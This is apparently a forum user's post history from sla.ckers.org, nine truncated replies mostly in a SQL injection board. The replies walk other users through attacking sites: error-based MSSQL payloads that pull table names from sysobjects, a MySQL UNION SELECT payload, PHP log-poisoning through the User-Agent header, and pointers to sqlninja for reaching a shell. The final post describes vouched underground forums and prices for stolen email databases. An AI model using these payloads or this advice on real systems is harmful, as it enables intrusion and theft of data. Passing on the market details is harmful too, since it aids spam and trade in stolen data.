Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Ways to stop spam, detect robotic activity, and actually harm the spam trade, as well as how it works, how to circumvent filters, etc. 

Current Page: 1 of 1
Results 1 - 9 of 9
5 years ago
badeat
ok I don't have time to play with mssql server so you have to try this because i'm not sure if they work... try vuln.cfm?var=1 AND CAST(SELECT TOP 1 name FROM sysobjects WHERE xtype=char(85) as nvarchar)=1 or vuln.cfm?var=1 AND CAST(SELECT TOP 1 name FROM sysobjects WHERE xtype=char(85) as nvarchar)=CAST(1 as int) or vuln.cfm?var=1 AND CAST(CAST(SELECT TOP 1 name FROM sysobjects WHERE
Forum: SQL and Code Injection
5 years ago
badeat
For (2) Find out which apache version and what operating system it is. Then use this website -> http://wiki.apache.org/httpd/DistrosDefaultLayout to see where the logs default location will be. If they have been relocate; read httpd.conf and you will find them. For(1) Are you sure you looked at the latest log? Try injecting the php code in the User-Agent. If they have a forum, try reading
Forum: SQL and Code Injection
5 years ago
badeat
It's not blind. Let's say you put "union select 1,2,3,4--" The webserver gets that and uses it in more than one queries. One of them uses four columns, while the others use more. Thus the one that uses four columns will execute the query while the rest will give error. We only want one of them to work, thus this is perfect. Try -481234+union+select 1,2,concat(0x5448494E4B583A20,@@ve
Forum: SQL and Code Injection
5 years ago
badeat
You can find a location of Apache configurations at this resource: http://wiki.apache.org/httpd/DistrosDefaultLayout Also a very good article -> "Backdoor webserver using MYSQL SQL injection" http://www.greensql.net/publications/backdoor-webserver-using-mysql-sql-injection
Forum: SQL and Code Injection
5 years ago
badeat
Get the id for the each table that shows up and then try SELECT name FROM sysobjects WHERE xtype=char(85) AND ID NOT IN (table'sID)
Forum: SQL and Code Injection
5 years ago
badeat
For : (SELECT TOP 1 user FROM table_name) try CAST to force the value as nvarchar and thus cause an error..example: SELECT CAST(1 as nvarchar) (to be sure google up cast syntax for mssql 2000) As far as this-> "But it didn't work for -1 AND (SELECT TOP 1 name FROM sysobjects WHERE xtype=char(85) AND Id=X)=1 " Most probably the id you used didn't have any tables with xtype
Forum: SQL and Code Injection
5 years ago
badeat
If I was you I would check out this http://sqlninja.sourceforge.net/ Direct quotation: "Fancy going from a SQL Injection to a full GUI access on the DB server? What about extracting password hashes on the fly? Take a few new SQL Injection tricks, add a couple of remote shots in the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug sc
Forum: SQL and Code Injection
5 years ago
badeat
it's mysql version 4.-something and exploitable.
Forum: SQL and Code Injection
5 years ago
badeat
There are forums that you have to get voucher by 3-5 people to access them. Usually Russian since all the English speaking ones keep getting raided by the fbi/interpol. Anyhow, email databases go for 5 to 10 dollars per 1000. The price depends on : a) If the database is fresh -> that means databases retrieved from legit websites, normally by hacking, and that haven't been sold already. b
Forum: SPAM
Current Page: 1 of 1